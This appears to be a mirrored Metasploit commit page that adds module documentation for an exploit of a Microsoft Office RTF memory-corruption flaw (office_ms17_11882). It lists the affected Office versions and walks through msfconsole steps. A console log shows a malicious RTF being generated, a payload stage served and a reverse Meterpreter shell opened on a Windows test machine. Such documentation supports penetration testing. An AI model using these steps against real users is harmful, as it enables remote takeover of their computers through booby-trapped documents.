infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create office_ms17_11882.md

MS-2855/keylogger-mettle-extension
Austin 2017-11-21 14:45:56 -05:00 committed by GitHub
parent f7e2fb3164
commit fcf2cfa134
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 56 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
documentation/modules/exploit/windows/fileformat/office_ms17_11882.md Normal file
View File

@ -0,0 +1,56 @@
Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim
to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user.
## Vulnerable Application
- Microsoft Office 2016
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2007
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/windows/fileformat/office_ms17_11882`
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`
## Options
### FILENAME
Filename to output, and location to which should be written.
## Example
```
msf > use exploit/windows/fileformat/office_ms17_11882
msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_ms17_11882) > set LHOST ens3
LHOST => ens3
msf exploit(office_ms17_11882) > set LPORT 35116
LPORT => 35116
msf exploit(office_ms17_11882) > run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.0.11:35116
msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo
[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo
[*] Server started.
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217) at 2017-11-21 14:41:59 -0500
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```